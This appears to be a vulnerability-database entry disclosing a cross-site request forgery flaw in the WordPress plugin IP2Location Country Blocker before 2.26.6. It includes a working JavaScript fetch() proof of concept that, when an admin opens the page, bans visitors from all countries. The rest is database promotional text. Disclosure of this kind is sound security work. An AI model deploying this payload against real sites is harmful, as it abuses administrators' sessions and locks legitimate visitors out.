Lucene search
+L

IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF

🗓️ 06 Jan 2022 00:00:00Reported by Krzysztof ZającType 
wpexploit
 wpexploit
👁 97 Views

IP2Location Country Blocker CSRF Arbitrary Country Ba

Related
Refs
Code
Make an admin open a page with the following code in it, which will ban visitors from all countries:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(function(data) { console.log(data); });

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Apr 2022 07:12Current
0.5Low risk
Vulners AI Score0.5
CVSS 25.8
CVSS 3.17.1
EPSS0.00451
97